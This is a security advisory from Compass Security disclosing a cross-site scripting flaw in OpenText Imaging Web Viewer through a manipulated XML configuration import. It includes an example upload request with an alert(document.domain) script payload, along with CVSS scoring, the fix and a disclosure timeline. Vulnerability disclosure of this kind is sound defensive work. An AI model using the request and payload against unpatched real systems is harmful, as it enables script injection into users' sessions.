WebViewer Configuration Console

############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: Imaging Web Viewer # Vendor: OpenText # CSNC ID: CSNC-2022-004 # Subject: Cross-Site Scripting via XML Upload # Severity: High # Effect: Cross-Site Scripting # Author: Stephan Sekula # Date: 2022-03-16 # ############################################################# Introduction ------------ The Imaging Web Viewer combines the benefits of several technologies and can be used in all imaging scenarios. Based on the new capabilities of Web 2.0, it provides a completely new experience for the end user. Because there is no client installation, TCO and administrative overhead is dramatically reduced. The Imaging Web Viewer is ideal for Internet-based solutions in which different types of users on different desktop environments need access to business documents. [1] During a customer project, we could upload a manipulated XML file via the configuration import. Due to the fact that no output encoding is implemented, this leads to Cross-Site Scripting. Affected -------- Vulnerable: * OpenText Imaging Web Viewer <= CE 21.1 Not vulnerable: * OpenText Imaging Web Viewer >= CE 21.1 with hotfix No other version was tested, but it is believed for the older versions to be vulnerable as well. Technical Description --------------------- An attacker can manipulate an XML file and upload it via the configuration import. Request: POST /WebViewer/config?action=importfile HTTP/1.1 Host: webviewer-tst.mah.roche.com:8090 Cookie: [CUT] [CUT] Content-Type: multipart/form-data; boundary=---------------------------218446413518949174912543039792 Content-Length: 8192 Origin: [CUT] [CUT] Connection: close -----------------------------218446413518949174912543039792 Content-Disposition: form-data; name="file"; filename="viewer.xml" Content-Type: text/xml [CUT] SCRIPT]]> alert(document.domain); /SCRIPT]]> [CUT] -----------------------------218446413518949174912543039792-- Response: HTTP/1.1 200 Access-Control-Allow-Origin: [CUT] Access-Control-Allow-Credentials: true [CUT] Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 22 Dec 2021 14:14:07 GMT Connection: close Content-Length: 43235 […] Resulting HTML (loaded configuration page): WebViewer Configuration Console [CUT]

[CUT] [CUT] ILLEGALCOMPONENTNAMES Reads [CUT] [CUT]

[CUT] Vulnerability Classification ---------------------------- CVSS v3.1 Metrics [2]: - CVSS Base Score: 8.4 (High) - CVSS Vector: AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H Workaround / Fix ---------------- Install the hotfix/update provided by OpenText. Timeline -------- 2021-12-23: Vulnerability discovered 2022-01-25: Informed developer about the vulnerability 2022-03-15: Developer released hotfix 2022-03-16: Coordinated public disclosure References ---------- [1] https://www.opentext.com/file_source/OpenText/en_US/PDF/OpenText%20Archiving%20and%20Document%20Access%20for%20SAP%20Solutions%20Whitepaper.pdf [2] https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H&version=3.1